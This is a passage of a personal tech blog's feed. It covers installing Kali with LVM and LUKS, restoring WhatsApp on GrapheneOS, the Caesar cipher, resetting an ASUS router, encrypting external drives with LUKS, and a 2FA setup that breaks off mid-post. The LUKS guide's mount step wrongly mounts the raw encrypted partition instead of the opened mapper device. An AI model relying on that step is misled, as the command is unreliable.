Kali Linux, also known as the Debian installer, requires an EFI System Partition (ESP) to be created. Unlike Arch, where the EFI and boot partitions can be combined, we will create a separate partition for the EFI. Click on `Create a new partition` and use the following settings:

![Create ESP 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/5_1_ESP create.png)

For safety, I will create a 1G partition for the ESP partition, type in `1GB` and click on `Continue`.

![Create ESP 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/5_2_ESP create.png)

for the Beginning or End of this space, choose `Beginning` and click on `Continue`.

![Create ESP 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/5_3_ESP create.png)

Now, we need to choose the partition type, by clicking on `Use as`.

![Create ESP 4](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/5_4_ESP create.png)

Choose `EFI System Partition` and click on `Done setting up the partition`.

![Create ESP 5](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/5_5_ESP create.png)

And now, click on `Done setting up the partition` to finish the ESP partition creation.

![Create ESP 6](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/5_6_ESP create.png)

And you should see the new ESP partition created!

![Create ESP 7](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/5_7_ESP create.png)

### 2.3. Create BOOT Partition

Now, we will create a new partition for the boot partition. Click on `FREE SPACE`.

![Create BOOT 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_1_BOOT create.png)

Click on `Create a new partition`.

![Create BOOT 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_2_BOOT create.png)

Same as the ESP partition, I will create a 1G partition for the BOOT partition, type in `1GB` and click on `Continue`.

![Create BOOT 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_3_BOOT create.png)

Choose `Beginning` and click on `Continue`.

![Create BOOT 4](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_4_BOOT create.png)

Again, click on `Use as`, but this time choose `Ext2 file system` as `filesystem`.

![Create BOOT 5](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_5_BOOT create.png)

Now, setting the mount point, click on `Mount point`.

![Create BOOT 6](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_6_BOOT create.png)

Choose `/boot` as the mount point.

![Create BOOT 7](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_7_BOOT create.png)

Click on `Done setting up the partition` to finish the BOOT partition creation.

![Create BOOT 8](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_8_BOOT create.png)

And you should see the new BOOT partition created! Keep going, you are almost there!

![Create BOOT 9](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_9_BOOT create.png)

### 2.4. Create LVM Partition

This is the most anonying part of setting up LVM partition. Click on `Create a new partition`.

![](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_9_BOOT create.png)

Click `Create a new partition` again.

![Create LVM 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/7_1_LVM create.png)

As the example, i use 100% of the remaining space for the LVM partition, type in `100%` or press the `Enter` key as the default value and click on `Continue`.

![Create LVM 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/7_2_LVM create.png)

&gt;**NOT GOOD IMAGE**: The image of this should be label as the `Use as`.

Click on `Use as`.

![Create LVM 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/7_3_LVM create.png)

Choose `physical volume for lvm`.

![Create LVM 4](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/7_4_LVM create.png)

Click on `Done setting up the partition` to finish the LVM partition creation.

![Create LVM 5](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/7_5_LVM create.png)

The new LVM partition is created! Now, we will configure the Logical Volume Manager.

![Create LVM 6](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/7_6_LVM create.png)

### 2.5 Configure encrypted volumes

We now will setting up the LUKS encryption for the LVM partition. Click on `Configure encrypted volumes`.

![Configure encrypted volumes 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/8_1_Configure encrypted volumes.png)

Click on `Yes` to write the changes to the disk.

![Configure encrypted volumes 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/8_2_Configure encrypted volumes.png)

Click on `Create encrypted volumes`.

![Configure encrypted volumes 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/8_3_Configure encrypted volumes.png)

Select the LVM partition, and click on `Continue`.

![Configure encrypted volumes 4](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/8_4_Configure encrypted volumes.png)

Click `Done setting up the partition`.

![Configure encrypted volumes 5](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/8_5_Configure encrypted volumes.png)

Click `Finish` to finish the encrypted volumes configuration.

![Configure encrypted volumes 6](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/8_6_Configure encrypted volumes.png)

The installer will ask you do you want to earse the data on the partition, you can skip this step by clicking on `No`.

![Configure encrypted volumes 7](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/8_7_Configure encrypted volumes.png)

enter your preferred password for the LUKS encryption, and click on `Continue`.

![LVM password 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/9_1_LVM password.png)

If your password is less than 8 characters, the installer will ask you to confirm the password, in my case, i dont care, this virtual machine is just for the guide. so click on `Continue`.

![LVM password 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/9_2_LVM password.png)

### 2.6. Configure the Logical Volume Manager

This part is about configuring the Logical Volume Manager (LVM). Click on `Configure the Logical Volume Manager`.

![Configure the Logical Volume Manager 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/10_1_Configure the Logical Volume Manager.png)

Will asking you to create a new volume group, and write the change to the disk, click on `Yes`.

![Configure the Logical Volume Manager 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/10_2_Configure the Logical Volume Manager.png)

Click on `Create volume group`.

![Create volume group 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/11_1_Create volume group.png)

Type the name of the volume group you want to naming, i use `kali` as the name, and click on `Continue`.

![Create volume group 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/11_2_Create volume group.png)

Find out the device you want to add for this volume group, and check the box, and click on `Continue`.

![Create volume group 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/11_3_Create volume group.png)

Click on `Yes` to write the change to the disk.

![Create volume group 4](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/11_4_Create volume group.png)

To verify the volume group is created, click on `Display configuration details`.

![Create volume group 5](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/11_5_Create volume group.png)

Nice, the volume group is created! Now, we will create the logical volume for the swap partition.

![Create volume group 6](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/11_6_Create volume group.png)

### 2.7. Create Logical Volume for Swap Partition

Click on `Create logical volume`. we will create two logical volumes, one for the swap partition and the other for the root partition.

You might want to create home partition, but i dont create it because i dont need it.

![Create logical volume swap 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/12_1_Create logical volume swap.png)

Select the volume group that before you created, and click on `Continue`.

![Create logical volume swap 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/12_2_Create logical volume swap.png)

Type the name of the logical volume, i use `swap` as the name, and type the size of the logical volume.

![Create logical volume swap 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/12_3_Create logical volume swap.png)

Type a size for the swap partition, i use `10GB` as the size, and click on `Continue`.

![Create logical volume swap 4](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/12_4_Create logical volume swap.png)

To verify the logical volume is created, click on `Display configuration details`.

![Create logical volume swap 5](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/12_5_Create logical volume swap.png)

Nice, the logical volume for the swap partition is created! Now, we will create the logical volume for the root partition.

![Create logical volume swap 6](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/12_6_Create logical volume swap.png)

### 2.8. Create Logical Volume for Root Partition

Click on `Create logical volume`.

![Create logical volume root 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/13_1_Create logical volume root.png)

Select the volume group that before you created, and click on `Continue`.

![Create logical volume root 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/13_2_Create logical volume root.png)

Type the name of the logical volume, i use `root` as the name.

![Create logical volume root 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/13_3_Create logical volume root.png)

Type a size for the root partition, i use `100%` as the size, for the maximum size you also can enter to use the default value, and click on `Continue`.

![Create logical volume root 4](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/13_4_Create logical volume root.png)

To verify the logical volume is created, click on `Display configuration details`.

![Create logical volume root 5](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/13_5_Create logical volume root.png)

Nice, the logical volume for the root partition is created! Now, we will format the LVM partitions.

![Create logical volume root 6](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/13_6_Create logical volume root.png)

Click the `Finish` button to finish the partitioning.

![Create logical volume root 7](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/13_7_Create logical volume root.png)

### 2.9. Format LVM Partitions

The following partition of correct format is important, you should see a similar screen table as below :)

now, we will format the logical volume for the root partition and the swap partition make it useable.

![Create logical volume root 8](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/13_8_Create logical volume root.png)

Use arrow keys to select the `root` partition, and press `Enter`.

![Format LVM root 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/14_1_format LVM root.png)

Click on `Use as`.

![Format LVM root 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/14_2_format LVM root.png)

Choose `Ext4 journaling file system` as the filesystem, and click on `Done setting up the partition`.

&gt;**NOTE**: You also can choose `btrfs` as the filesystem, which also a good choice for the snapshot filesystem, but i choose `ext4` because it is just for this guide.

![Format LVM root 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/14_3_format LVM root.png)

Click on `Mount point`.

![Format LVM root 4](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/14_4_format LVM root.png)

Choose `/` as the mount point with root filesystem.

![Format LVM root 5](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/14_5_format LVM root.png)

Click on `Done setting up the partition` to finish the root partition format.

![Format LVM root 6](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/14_6_format LVM root.png)

You should see the root partition is mounted with d label as `/`.

![Format LVM root 7](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/14_7_format LVM root.png)

Now, we will format the logical volume for the swap partition, select the `swap` partition, and press `Enter`.

![Format LVM swap 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/15_1_format LVM swap.png)

Click on `Use as`. Our swap partition will be used as a swap area.

![Format LVM swap 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/15_2_format LVM swap.png)

Choose `swap area` as the filesystem.

![Format LVM swap 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/15_3_format LVM swap.png)

Click on `Done setting up the partition` to finish the swap partition format.

![Format LVM swap 4](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/15_4_format LVM swap.png)

And yes! our table is ready to use !!!

![Format LVM swap 5](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/15_5_format LVM swap.png)

### 2.10. Write the changes to the disk

Now, the partitioning is done, click on `Finish partitioning and write changes to disk`.

![Partition finished 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/16_1_Parition finished.png)

Click on `Yes` to write the changes to the disk.

![Partition finished 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/16_2_Parition finished.png)

The installer will start to install the base system. just wait for a while.

![Install the base system](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/3_install/1_Install the base system.png)

### 3. Software Selection

Select the software you want to install, mostly the default option is good enough, but find one that suits you. the Desktop environment of what you want to use.

![Software selection](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/3_install/2_Software selection.png)

Wait for the installation to finish.

![Select and install software](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/3_install/3_Select and install software.png)

### 4. Reboot the system

After the installation is finished, click on `Continue`. you now can try out your new Kali Linux system with rebooting the system.

![Finish the installation 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/4_finish/1_1_Finish the installation.png)
![Finish the installation 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/4_finish/1_2_Finish the installation.png)

### 5. Booting the system

After rebooting the system, you will see the GRUB boot loader screen :)

![GRUB configuration](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/4_finish/2_GRUB.png)

### 6. Unlock LUKS

You will be asked to unlock the LUKS encryption, type in the password you set before, and press `Enter`.

![Unlock LUKS 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/4_finish/3_1_unlock luks.png)
![Unlock LUKS 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/4_finish/3_2_unlock luks.png)
![Unlock LUKS 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/4_finish/3_3_unlock luks.png)

![Login screen 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/4_finish/4_1_login.png)
![Login screen 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/4_finish/4_2_login.png)

### Check the LVM partition

Wow, you have successfully installed Kali Linux with LVM and LUKS encryption! You can check the LVM partition by running the `lsblk` command.

![List block devices](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/4_finish/5_lsblk.png)

### My feeling

~~Debian is harder than Arch Linux to install. I can more confirm I&apos;m cli guy XD~~</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Restoring WhatsApp Chats on GrapheneOS with Google Drive Backup</title><link>https://ummit.dev//posts/mobile/grapheneos/whatsapp-googledrive-resotre/</link><guid isPermaLink="true">https://ummit.dev//posts/mobile/grapheneos/whatsapp-googledrive-resotre/</guid><description>GrapheneOS with Google Drive backup. Ensure Google Play Services has the necessary permissions to access your contacts.</description><pubDate>Sun, 26 Jan 2025 00:00:00 GMT</pubDate><content:encoded>## Story

Today, I decided to use WhatsApp on my GrapheneOS device as my main device, rather than just linking it to my old phone. Previously, I had only linked my GrapheneOS to access WhatsApp, but I realized that I was missing out on several features, particularly the backup feature, which required my old device to be turned on. I wanted to keep my old device off, as it was essentially just serving as a second clock. Additionally, I noticed that I couldn&apos;t download images and videos on my GrapheneOS device because it was set up as a linked device. So, I made the switch to make GrapheneOS my primary WhatsApp device.

However, I encountered a problem when trying to restore my chat history from Google Drive. During the restore process, I couldn&apos;t see my Google account, no matter how many times I logged in again. Frustrated, I turned to the internet for solutions on how to restore my chat history on GrapheneOS.

After some research, I discovered that the issue was actually quite simple. The problem stemmed from permission restrictions on GrapheneOS. Specifically, Google Play Services needed the appropriate permissions to access my contacts.

Through this article, I want to share the solution I found for restoring chat history from Google Drive on GrapheneOS. By ensuring that Google Play Services has the necessary permissions, you can successfully restore your WhatsApp chats and enjoy all the features that come with using WhatsApp as your main device.

### Quick Guide

Let’s assume you have a GrapheneOS device and have installed WhatsApp through the GrapheneOS Google Play Mirror. If you want to restore your chat history from Google Drive, here’s a quick guide to help you through the process:

1. **Install Google Play Services**: Make sure you have the sandboxed version of Google Play Services installed on your GrapheneOS device.

2. **Grant Permissions**:
   - Go to Settings &gt; Apps &gt; Google Play Services.
   - Ensure it has access to contacts and storage.

3. **Backup on Old Device**: On your old device, back up your WhatsApp chats by going to WhatsApp settings &gt; Chats &gt; Chat backup.

4. **Install WhatsApp**: Download and install WhatsApp on your GrapheneOS device.

5. **Restore Chats**:
   - Open WhatsApp and verify your phone number.
   - Follow the prompts to restore your chat history from Google Drive.
   - Now you should be able to see your Google account during the restore process.

6. **Finish Setup**: Complete the setup process and you should have your WhatsApp chats restored on your GrapheneOS device.

### Example of GrapheneOS Google Play Services Permission

![GrapheneOS Google Play Services Permission](./featured.png)

## Disable Google Play Services Permission

I’ve noticed that the contacts permission for Google Play Services plays a crucial role in Google login detection. You can enable this permission when you need to log into any Google service, so you won’t have to log in manually again, as you’re already logged in through Google Play Services. The key point is to only allow the permission to access contacts when necessary.

Moreover, I recommend disabling this permission after you finish the restore process because Google Play Services doesn’t need access to your contacts afterward. It’s a good practice to limit the permissions granted to Google Play Services.

The permission only needs to be granted during the restore process. After that, you can disable it. Once you&apos;ve restored your chats, you can back them up again without any issues. You can safely disable the contacts permission for Google Play Services afterward.

## Thanks for the solution links:

[WhatsApp cannot see Google account for cloud recovery #1122](https://github.com/GrapheneOS/os-issue-tracker/issues/1122). (n.d.). GitHub. Retrieved October 10, 2023, from https://github.com/GrapheneOS/os-issue-tracker/issues/1122</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Caesar Cipher encryption and decryption</title><link>https://ummit.dev//posts/infosec/cryptography/caesar-cipher/</link><guid isPermaLink="true">https://ummit.dev//posts/infosec/cryptography/caesar-cipher/</guid><description>Understand Caesar Cipher substitution encryption technique with step-by-step examples of encryption and decryption processes.</description><pubDate>Wed, 15 Jan 2025 00:00:00 GMT</pubDate><content:encoded>## Introduction

Caesar Cipher is a type of substitution cipher in which each letter in the plaintext is shifted a certain number of places down the alphabet. For example, with a shift of 1, A would be replaced by B, B would become C, and so on. Here is a quick example of the Caesar Cipher encryption and decryption.

- Encryption: that is shifting the letters to the right (Add)
- Decryption: that is shifting the letters to the left (Subtract)

In a Caesar Cipher, each letter is shifted by a certain number of places down the alphabet. For example, with a shift of 3, A becomes D, B becomes E, and so on.

## Table of A-Z letters

Before we start, let&apos;s create a table of A-Z letters and their corresponding numbers.

| Letter | Number |
|--------|--------|
| A      | 1      |
| B      | 2      |
| C      | 3      |
| D      | 4      |
| E      | 5      |
| F      | 6      |
| G      | 7      |
| H      | 8      |
| I      | 9      |
| J      | 10     |
| K      | 11     |
| L      | 12     |
| M      | 13     |
| N      | 14     |
| O      | 15     |
| P      | 16     |
| Q      | 17     |
| R      | 18     |
| S      | 19     |
| T      | 20     |
| U      | 21     |
| V      | 22     |
| W      | 23     |
| X      | 24     |
| Y      | 25     |
| Z      | 26     |

## Encryption

Let assume that we have a plaintext `HELLO` and we want to encrypt it using Caesar Cipher with a shift of 3. The encryption process would be as follows:

1. Convert each letter of the plaintext to its corresponding number.
2. Shift each number by the specified shift value.
3. Convert each shifted number back to its corresponding letter.

For example, to encrypt the plaintext `HELLO` with a shift of 3:

- H -&gt; 8
- E -&gt; 5
- L -&gt; 12
- L -&gt; 12
- O -&gt; 15

After shifting each number by 3:

- H -&gt; 8 + 3 = 11 -&gt; K
- E -&gt; 5 + 3 = 8 -&gt; H
- L -&gt; 12 + 3 = 15 -&gt; O
- L -&gt; 12 + 3 = 15 -&gt; O
- O -&gt; 15 + 3 = 18 -&gt; R

Therefore, the encrypted text would be `KHOOR`.

## Decryption

To decrypt the encrypted text `KHOOR` with a shift of 3:

1. Convert each letter of the encrypted text to its corresponding number.
2. Shift each number back by the specified shift value.
3. Convert each shifted number back to its corresponding letter.

For example, to decrypt the encrypted text `KHOOR` with a shift of 3:

- K -&gt; 11
- H -&gt; 8
- O -&gt; 15
- O -&gt; 15
- R -&gt; 18

After shifting each number back by 3:

- K -&gt; 11 - 3 = 8 -&gt; H
- H -&gt; 8 - 3 = 5 -&gt; E
- O -&gt; 15 - 3 = 12 -&gt; L
- O -&gt; 15 - 3 = 12 -&gt; L
- R -&gt; 18 - 3 = 15 -&gt; O

Therefore, the decrypted text would be `HELLO`.

## Overflow positions

Overflow positions is the situation when the shift value is greater than 26. For example, if the shift value is 30. In this case, we can simply subtract 26 from the shifted number to get the correct position.

As the example, Using 25 as the shift value of `E`: (encrypt)

- E -&gt; 5 + 25 = 30 -&gt; 30 - 26 = 4 -&gt; D

so the encrypted text would be `D`.

This method only need to when the value is greater than 26, which is out of the range of A-26 (1-26).

## Conclusion

Caesar Cipher is a simple encryption technique that can be easily broken by brute force. I wrote this only for taking notes of my school. Please dont use this on your real project. If you want to encrypt your data, you should use a more secure encryption algorithm like AES, RSA, etc.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to Hard Factory Reset an ASUS Router (Method 5)</title><link>https://ummit.dev//posts/hardware/asus/router/hard-factory-reset/</link><guid isPermaLink="true">https://ummit.dev//posts/hardware/asus/router/hard-factory-reset/</guid><description>Complete guide to performing a hard factory reset on ASUS routers using the WPS button method.</description><pubDate>Thu, 02 Jan 2025 00:00:00 GMT</pubDate><content:encoded># Introduction

This tutorial will guide you through the process of how you can hard factory reset an ASUS router using Method 5.

But wait, why you need to reset your ASUS router? There are several reasons why you might want to perform a hard factory reset on your ASUS router. Some common reasons include:

- You forget the login credentials for your router.
- You&apos;re want to reset the router to its default settings make it clean to the initial state.
- The login page is not accessible or not working properly (ASUS issues)
- The username and password are not working, and you can&apos;t access the router&apos;s settings (ASUS issues), their username are not allow number at the front of the username to login, But allow you to change the username to number at the front of the username. (Very weird)

For me, why this article is created because I have experienced the last issue, and I can&apos;t access the router&apos;s settings. So, I need to reset the router to its default settings. and yeah. it&apos;s fucking weired and stupid.

### Steps to Hard Factory Reset Your ASUS Router

This is the Method 5 to hard factory reset your ASUS router. which is needed to press and hold the WPS button to reset the router. ***If you don&apos;t have the WPS button, this article is not for you.***

Pretty simple, follow these steps to hard factory reset your ASUS router:

1. **Turn Off Your Router**: Begin by powering off your router. pressing the power button located on the device.

2. **Press and Hold the WPS Button**: Locate the WPS (Wi-Fi Protected Setup) button on your router. Press and hold this button. This step is crucial as it initiates the reset process.

3. **Turn On the Router**: While still holding the WPS button, turn the router back on by pressing the power button. This action will start the router&apos;s boot-up process.

4. **Release the WPS Button**: Keep an eye on the power light indicator. Once you notice that the power light has stopped flashing, you can release the WPS button. This indicates that the router is now in the process of resetting.

After completing these steps, your ASUS router will automatically reboot. Once the reboot is finished, the router will be restored to its factory settings, and you can set it up as if it were new.

### Reconfiguring Your Network Settings

After the hard factory reset successfully completes, you should see the have a wifi network named with `ASUS_&lt;model&gt;` and this is the default network name. You can connect to this network and access the router&apos;s settings page by entering the default username and password. The default username and password are usually `admin` for both fields.

## Conclusion

The process of hard factory resetting usually took around 5-10 minutes to complete. After the reset, you can reconfigure your network settings and set up your router as needed. This method is useful when you encounter issues with your ASUS router and need to restore it to its default settings.

## References

- [How to Hard Factory Reset ASUS Router? (Method 5) | ASUS SUPPORT](https://www.youtube.com/watch?v=RGONeydSKmo)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Encrypting External Drives with LUKS</title><link>https://ummit.dev//posts/linux/tools/luks/luks-external-encryption/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/luks/luks-external-encryption/</guid><description>This article will guide you through the process of encrypting an external drive with LUKS and mounting it on your GNU/Linux system.</description><pubDate>Sun, 29 Dec 2024 00:00:00 GMT</pubDate><content:encoded>## Introduction

Encrypting your external drive is a great way to protect your data from unauthorized access in case the drive is lost or stolen. LUKS (Linux Unified Key Setup) is a popular disk encryption method that allows you to encrypt your drives with ease. This article will guide you through the process of encrypting an external drive with LUKS and mounting it on your GNU/Linux system.

### Prerequisites

Before you begin, make sure you have the following:

- An external drive that you want to encrypt.
- A GNU/Linux system with the `cryptsetup` package installed.

## Step 1: Identify the External Drive

First, you need to identify the device identifier of your external drive. You can do this by plugging in the drive and running the following command:

```bash
lsblk
```

## Step 2: Create a filesystem on the External drive

Before encrypting the drive, you need to using tool like gdisk or fdisk to initialize the disk and create a partition. For example, to create a partition on `/dev/sdb`, you can use the following command:

```bash
sudo gdisk /dev/sdb
o # Create a new empty GUID partition table (GPT)
n # Create a new partition
&lt;Enter&gt; # Use the default partition number
&lt;Enter&gt; # Use the default first sector
&lt;Enter&gt; # Use the default last sector
t # Change the partition type
L # List known partition types
&lt;Enter&gt; # Choose the Linux filesystem type (e.g., 8309 for LUKS)
w # Write changes to disk
```

In case you lsblk again don&apos;t show the new partition, you can run the following commands for the system to recognize the new partition:

```bash
sudo sync
sudo partprobe /dev/sdb
```

And now `lsblk` should show the new partition, for example `/dev/sdb1`.

## Step 3: Encrypt the External Drive

To encrypt the external drive, use the `cryptsetup` command with the `luksFormat` option. Replace `/dev/sdb1` with the actual device identifier of your external drive:

```bash
cryptsetup luksFormat --type luks2 --cipher aes-xts-plain64 --hash sha256 --iter-time 10000 --key-size 256 --pbkdf argon2id --use-urandom --verify-passphrase /dev/sdb1

YES
```

You will be prompted to enter a passphrase for the encryption.

## Step 4: Open the Encrypted drive

After encrypting the drive, you need to open it using the `cryptsetup open` command. Replace `/dev/sdb1` with the actual device identifier of your encrypted drive and `yourdrive` with a name you want to assign to the mapped device:

```bash
sudo cryptsetup open /dev/sdb1 yourdrive
```

You will be prompted to enter the passphrase you set during encryption.

## Step 5: Create a Filesystem on the Mapped device

Now that the encrypted drive is open, you can create a filesystem on the mapped device. For example, to create an btrfs filesystem on the mapped device `/dev/mapper/yourdrive`, you can use the following command:

```bash
sudo mkfs.btrfs /dev/mapper/yourdrive
```

## Step 6: Mount the Encrypted Drive

Finally, you can mount the encrypted drive to a directory of your choice. For example, to mount the mapped device `/dev/mapper/yourdrive` to the `/mnt/encrypted` directory, you can use the following command:

```bash
mount --mkdir /dev/sdb1 /mnt/yourdrive
```

You can now access the encrypted drive at the specified mount point. To ensure that the drive is mounted you can type &apos;lsblk&apos; and see if the drive is mounted.

## Close the Encrypted drive

To close the encrypted drive, you can use the `cryptsetup close` command. Replace `yourdrive` with the name you assigned to the mapped device:

```bash
sudo cryptsetup close yourdrive
```

## Cannot Unmount the Drive

If you are unable to unmount a drive, it is likely that the drive is still in use. You can follow these steps to identify and resolve the issue:

### Step 1: Check for Open Files

Use the `lsof` command to check for any open files on the mount point:

```bash
sudo lsof +D /mnt/yourdrive
```

### Step 2: Identify Processes Using the Mount Point

You can also use the `fuser` command to identify which processes are using the mount point:

```bash
sudo fuser -m /mnt/yourdrive
```

### Step 3: Terminate Specific Processes

If you need to terminate a specific process using the mount point, you can use the following command:

```bash
sudo kill -9 PID
```

### Step 4: Kill Processes Using the Mount Point

If you don&apos;t sure which process is using the mount point and don&apos;t care about those processes, you can kill all processes using the mount point, which is all processes using the drive, all the using files will be closed.

```bash
sudo fuser -k /mnt/yourdrive
```

## Step 5: Unmount the Encrypted Drive

Once you have closed all processes using the mount point, you can unmount the encrypted drive using the following command:

```bash
sudo umount /mnt/yourdrive
```

## Step 6: Close the Encrypted Drive

Finally, you can close the encrypted drive using the `cryptsetup close` command:

```bash
sudo cryptsetup close yourdrive
```

## Don&apos;t Force Unplugging the Drive

Gernerally, many people forget to unmount the drive before closing the encrypted drive, which will cause the drive to be still in use. And just foce to unplugging the drive will cause the drive to be corrupted. So, it is important to unmount the drive before closing the encrypted drive.

## Conclusion

That&apos;s all! You have successfully encrypted an external drive with LUKS and mounted it on your GNU/Linux system. Remember to safely unmount and close the encrypted drive before disconnecting it to avoid data corruption.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to Set Up 2FA on Linux for Enhanced Security</title><link>https://ummit.dev//posts/linux/undefine/2fa-setup-on-linux/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/undefine/2fa-setup-on-linux/</guid><description>This guide walks you through the steps to set up Two-Factor Authentication (2FA) on a Linux server to add an extra layer of security for your system.</description><pubDate>Tue, 10 Dec 2024 00:00:00 GMT</pubDate><content:encoded># Introduction

Actually, Just past of the day, via my school, I knew there is a way to setup 2FA, then i started to learn how to set up. And now, i world like to share with you guys.

# Prerequisites

Before you begin, make sure you have the following:

- **A GNU/Linux server**: This guide will use Ubuntu as an example, but the steps should apply to most distributions.
- **A 2FA app**: Popular options include Google Authenticator, Authenticator, or Authy.
- Basic knowledge of Linux commands is assumed.
- Do not use the root account for this setup. Using the root account might cause login issues after enabling 2FA.

## Step 1: Install the 2FA Package

To begin, you need to install the `libpam-google-authenticator` package on your server, which will enable 2FA functionality.

Run the following command to install it:

```bash
sudo apt update
sudo apt install libpam-google-authenticator
```

## Step 2: Configure the 2FA Package

Next, configure the Google Authenticator package by running:

```bash
google-authenticator
```

The system will prompt you with a few questions. You can generally respond with **&apos;yes&apos;** to each one.

Once completed, you&apos;ll see a **QR code** and a **secret key**.

## Step 3: Scan the QR Code or Enter the Secret Key

Now, open your 2FA app (Google Authenticator, Authy, etc.), and either:

- **Scan the QR code** displayed on the terminal, or
- **Manually enter the secret key** if you can’t scan it.

Your app will start generating time-based 6-digit codes.

&gt; **Tip:** If you’re using a different 2FA app, the process will be the same. Just make sure to enter the secret key manually if scanning the QR code isn&apos;t an option.

## Step 4: Configure SSH for 2FA

Next, you need to configure SSH to use 2FA. Edit the SSH daemon&apos;s configuration file:

```bash
sudo vim /etc/ssh/sshd_config
```

Make sure these two lines are present (or add them if they aren&apos;t):

```bash
KbdInteractiveAuthentication yes
ChallengeResponseAuthentication yes
```

These settings will enable keyboard-interactive authentication (which includes 2FA).

After saving the changes, close the file.

## Step 5: Restart SSH Service

To apply the changes, restart the SSH service:

```bash
sudo systemctl restart ssh
```

## Step 6: Configure PAM for 2FA

PAM (Pluggable Authentication Modules) must also be configured to use Google Authenticator. Edit the PAM configuration for SSH:

```bash
sudo vim /etc/pam.d/sshd
```

Add the following line to the file:

```bash
